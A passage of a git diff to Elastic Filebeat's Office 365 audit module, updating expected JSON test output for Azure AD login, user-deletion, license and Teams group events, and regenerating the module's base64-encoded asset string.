"testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:07.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "f3bc8508-1130-4d82-b7c7-4c1292b98600", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 40306, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:07", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "f3bc8508-1130-4d82-b7c7-4c1292b98600", + "o365.audit.InterSystemsId": "17b096b5-881a-4d72-8268-4854f9aa8910", + "o365.audit.IntraSystemId": "f3bc8508-1130-4d82-b7c7-4c1292b98600", + "o365.audit.ObjectId": "00000002-0000-0ff1-ce00-000000000000", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "00000002-0000-0ff1-ce00-000000000000", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-04T16:33:17.000Z", + "event.action": "deleted-user-account", + "event.category": "iam", + "event.code": "AzureActiveDirectory", + "event.dataset": "o365.audit", + "event.id": "1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "user", + "deletion" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 41567, + "o365.audit.Actor": [ + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "1003200112EB07E6", + "Type": 3 + }, + { + "ID": "User_21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.CreationTime": "2021-02-04T16:33:17", + "o365.audit.ExtendedProperties.additionalDetails": "{}", + "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User", + "o365.audit.Id": "1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd", + "o365.audit.InterSystemsId": "3e7b36e7-caba-4d7a-ae08-07f0a716135c", + "o365.audit.IntraSystemId": "995e2026-17cc-4599-8f63-b3f3556d784b", + "o365.audit.ModifiedProperties.Is_Hard_Deleted.NewValue": "False", + "o365.audit.ModifiedProperties.Is_Hard_Deleted.OldValue": "", + "o365.audit.ObjectId": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "o365.audit.Operation": "Delete user.", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 8, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "User_6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "10032001131B9761", + "Type": 3 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "1003200112EB07E6@testsiem4.onmicrosoft.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": [ + "root", + "6d4ca534c337474d8c766c715b31bc52newuser" + ], + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user.target.domain": "testsiem4.onmicrosoft.com", + "user.target.email": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "user.target.id": "6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com", + "user.target.name": "6d4ca534c337474d8c766c715b31bc52newuser" + }, + { + "@timestamp": "2021-02-04T16:33:14.000Z", + "event.action": "Change user license.", + "event.category": "web", + "event.code": "AzureActiveDirectory", + "event.dataset": "o365.audit", + "event.id": "4a27de4c-a2dd-4825-8f7f-6a623b3060ec", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 43022, + "o365.audit.Actor": [ + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "1003200112EB07E6", + "Type": 3 + }, + { + "ID": "User_21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.CreationTime": "2021-02-04T16:33:14", + "o365.audit.ExtendedProperties.additionalDetails": "{}", + "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User", + "o365.audit.Id": "4a27de4c-a2dd-4825-8f7f-6a623b3060ec", + "o365.audit.InterSystemsId": "443c61f9-900a-46cd-906f-7de2d16bd7b0", + "o365.audit.IntraSystemId": "74634e79-78c4-4335-8776-8afc267f5329", + "o365.audit.ObjectId": "newuser@testsiem4.onmicrosoft.com", + "o365.audit.Operation": "Change user license.", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 8, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "User_6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "6d4ca534-c337-474d-8c76-6c715b31bc52", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "newuser@testsiem4.onmicrosoft.com", + "Type": 5 + }, + { + "ID": "10032001131B9761", + "Type": 3 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "1003200112EB07E6@testsiem4.onmicrosoft.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "root", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:05:59.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoginFailed", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 44362, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:05:59", + "o365.audit.ErrorNumber": "50072", + "o365.audit.ExtendedProperties.RequestType": "Login:login", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.ExtendedProperties.UserAuthenticationMethod": "1", + "o365.audit.Id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.InterSystemsId": "9b4acea8-44ad-49f1-a9c3-88c075e8ba85", + "o365.audit.IntraSystemId": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.LogonError": "UserStrongAuthEnrollmentRequiredInterrupt", + "o365.audit.ObjectId": "00000002-0000-0000-c000-000000000000", + "o365.audit.Operation": "UserLoginFailed", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "00000002-0000-0000-c000-000000000000", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:05:59.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoginFailed", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 45730, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:05:59", + "o365.audit.ErrorNumber": "50072", + "o365.audit.ExtendedProperties.RequestType": "Login:login", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.ExtendedProperties.UserAuthenticationMethod": "1", + "o365.audit.Id": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.InterSystemsId": "9b4acea8-44ad-49f1-a9c3-88c075e8ba85", + "o365.audit.IntraSystemId": "eed8f929-567c-45bf-94ad-76ccf0f26300", + "o365.audit.LogonError": "UserStrongAuthEnrollmentRequiredInterrupt", + "o365.audit.ObjectId": "00000002-0000-0000-c000-000000000000", + "o365.audit.Operation": "UserLoginFailed", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "00000002-0000-0000-c000-000000000000", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:07.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 47098, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:07", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.InterSystemsId": "df4c6d6c-4551-4f2d-8766-03700dfccb47", + "o365.audit.IntraSystemId": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.ObjectId": "Unknown", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "Unknown", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json index 3425c52aafa5..4d3bf4463fce 100644 --- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams.log-expected.json @@ -1,8 +1,8 @@ [ { "@timestamp": "2020-02-17T16:59:44.000Z", - "event.action": "TeamCreated", - "event.category": "web", + "event.action": "added-group-account-to", + "event.category": "iam", "event.code": "MicrosoftTeams", "event.dataset": "o365.audit", "event.id": "49fa9883-50a9-4c9c-8e12-57e0948a9d8a", @@ -10,8 +10,12 @@ "event.module": "o365", "event.outcome": "success", "event.provider": "MicrosoftTeams", - "event.type": "info", + "event.type": [ + "group", + "creation" + ], "fileset.name": "audit", + "group.name": "SIEMTest", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", "log.offset": 0, @@ -36,8 +40,8 @@ }, { "@timestamp": "2020-02-17T16:59:47.000Z", - "event.action": "MemberAdded", - "event.category": "web", + "event.action": "added-users-to-group", + "event.category": "iam", "event.code": "MicrosoftTeams", "event.dataset": "o365.audit", "event.id": "3a951c24-3214-5529-b2fe-097628a39ecd", @@ -45,7 +49,10 @@ "event.module": "o365", "event.outcome": "success", "event.provider": "MicrosoftTeams", - "event.type": "info", + "event.type": [ + "group", + "change" + ], "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", @@ -87,19 +94,26 @@ "o365.audit.Version": 1, "o365.audit.Workload": "MicrosoftTeams", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.user": "asr", + "related.user": [ + "david@testsiem.onmicrosoft.com", + "chuck@testsiem.onmicrosoft.com", + "bob@testsiem.onmicrosoft.com", + "alice@testsiem.onmicrosoft.com", + "asr" + ], "service.type": "o365", "tags": [ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "asr@testsiem.onmicrosoft.com", "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr" }, { "@timestamp": "2020-02-17T16:59:44.000Z", - "event.action": "MemberAdded", - "event.category": "web", + "event.action": "added-users-to-group", + "event.category": "iam", "event.code": "MicrosoftTeams", "event.dataset": "o365.audit", "event.id": "3350cfd2-1020-5b11-99d8-2701f3a29ea3", @@ -107,7 +121,10 @@ "event.module": "o365", "event.outcome": "success", "event.provider": "MicrosoftTeams", - "event.type": "info", + "event.type": [ + "group", + "change" + ], "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", @@ -134,12 +151,16 @@ "o365.audit.Version": 1, "o365.audit.Workload": "MicrosoftTeams", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.user": "asr", + "related.user": [ + "asr@testsiem.onmicrosoft.com", + "asr" + ], "service.type": "o365", "tags": [ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "asr@testsiem.onmicrosoft.com", "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr" }, @@ -178,6 +199,7 @@ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "bob@testsiem.onmicrosoft.com", "user.id": "bob@testsiem.onmicrosoft.com", "user.name": "bob" } diff --git a/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json b/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json index 7401b62112b6..60092cad50ca 100644 --- a/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json @@ -62,6 +62,7 @@ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "asr@testsiem.onmicrosoft.com", "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr" }, diff --git a/x-pack/filebeat/module/o365/fields.go b/x-pack/filebeat/module/o365/fields.go index c371afd8dd9d..e57e3c7b163e 100644 --- a/x-pack/filebeat/module/o365/fields.go +++ b/x-pack/filebeat/module/o365/fields.go @@ -19,5 +19,5 @@ func init() { // AssetO365 returns asset data. // This is the base64 encoded gzipped contents of module/o365. func AssetO365() string { - return "eJzUmcFu40YMhu95ijkX2FyK9uBDAcP2LozGsRE5XfRUTCRaYT2aUTmUE+3TFzPqNrHitNn8vqyPnvATSZH/kM4Hs6d+YsKPP/90YYyyOpqY9W7HJZnhu4piKdwqBz8xv1wYY8wqVJ0jswti7q2vHPvauFBHs5PQPLO+vDBmx+SqOMl2w+eD8bah4ZmXtqtYnx0ao31LE1NL6Nqj7yva2c7pHxk4MTvrIo3+4IWjT5+P2Y2xg2Zlva2pIa9mulma7E0O5fLI/mUQT2FMSw0yetoQgxWx/ejkFOmJtZyPDr6i9tQ/BKn+PX3Fftu39B7CUSyz4JUedVmdDOrtnGU7rSqhGEHObSSBnfndNg3hKEeiC6+sPYyBAVfs96dze1x4rxNOlMu3ONG2UAxt67i0qV3nHFtn+2vbYO585UFufemEpqXygeYslGqnXxzIg8laPJb31te0IrVzq/byh5OscPcnlfrfqJlVqoOMleUbnJk5Jq/g+xsgS78LhQr7GiZtcAIsOLPQpMvgNCGp4ujAB2ni+DJ6hSxCDi7PmVBmbBnplVkXNTS3nv/qCPEmVTJmDXZVlmKQkZobCyQjitBJiSkE5eEltRQgD4tHJV9RtZHQkihTBGHirZuWJdRXn9I4h+k7UqfLJt0NrMW9FcQFX3KVhAZxxQ8ZvQp18FjlZlTRR6Umgi6JHTgQRqkBSm0wBwFgiSk12Cu54ghVR7ZXOoM05/paiLyym7ydASYkIdLYXTAQzMqyuwuPn7ozQNYPnmRlo5JMyzJ0Xs/hWqaeDXS7uQZA1NyRvHsz+MccaMRVqHjHxzcQgMN6ep2fgHTSuiXJMxeAkNp6/gJPf885YFqEa/ZW2dcFyYEAldhYsQ0pVjOb4Ljs56SW3btLd4AgCb6hMkiFSd4Nxc5poVY7YGIqyEdOW2gaB+ekVObiiUtfuq4iIMY8BG0Cez3DMlpQjGBRF3QgYQX22YIVeF/J+lYcAAAn/8H+IzvKs3uEpOYJhgnEwLnJK+sBzA/aCl3bBtEtl3uClHxrpabxCv+9/lY7BHOGH2sHUJrR1nKGPe0FDlPTLVlwqk8EbHIcpvGkm+xrJNUpK9Oa/OkafDMCdeFXAsQ2AbBX+hsJpnGf6Q5JwecgexcsQBj+m3BN+hBk/z+u/B0AAP//cb9ybQ==" + return "eJzUmUFv40YMhe/7K+ZcYHMp2oMPBVw7WRiNEyNyuuipGEu0wno0VDmUE++vL0bawoljd7N5vjRHK/z0huK8IaWPbkO7kZMff/7pg3PGFmjkbtdrLskNv1WUSuXWWOLI/fLBOefmUnWB3FrUPfhYBY61C1Int1ZpnkVffHBuzRSqNOrjhr+PLvqGhnte+K5ie3bROdu1NHK1Ste++L2ite+C/dkDR27tQ6KDf3gldP931cs4FOjmPvqaGormxouZ69X0S7l4Ef96EftljMfTT1nsrDq45bCQDe0eRffXjjNKEz0a7lX97uDKMTV71mx6cOFNSvbxy11L7yG8WMtEotGTwTmZteOqUkoJ5NwnUljMH75pCEcFUruMxraDMTDgmuPmeG5fFt5pwpFy+R4RLbZv2jZw6fOWn3Jqg9/d+AaT8y8PkvWlUxqXxluaslKund3lliKYrMun8sHHmuZkfurNX/xwlCWrv6i0/0ZNvFEteugs3yFmEpiigc9vgMziWgpTjjVMWuAE2HAm0uQD5Tghu+LBhSjapMMD7SS5i18LFKuliahSgCt9ojSIYWTbTbpk0txH/rsjRE3eFFg0ltSp3IhNOZnyqjPqt/xR2kokkI/f2O79GQFahqroTdes6Hh78TZIXgeW2x5RSKcl5n/Ut3fZMADzu3wyihVVC5WW1JgSCNPow7gsIde4UmnGbfv+cumbUOz4Q/berMlHJ1vx4BWREEuusg8jUuLwSK6lRm2yRxW7ZNQkUJL6gQNh0lTKa169v0pmRg1Q7UM4CJhId8IXgzzrAU7Gg0Vu1GBFcc3JfvWJltS0wRudiQZTJhJOTJFvRsxKiSABKO8cv2QLYB7yE8abid49+vMTZIAPNiPyzFkwsJi557CSp0/dGSC3j5F07pORjssy7+VzSOupZwPdL24AEOV+6d1j8ddwwCTnUvGaXzYoAA7zy9v+DshOum1J+ykBQGjtI3+B55XnHDAtyjVHbxzrgnSL9NcLr74hw2pmIYHL3ZTMc3h36Q4QJMF3VIpWmOXdUeqCFeatAxrqgmJi4y3laWFKRmVfPGkWy9BVBKyxb3EXw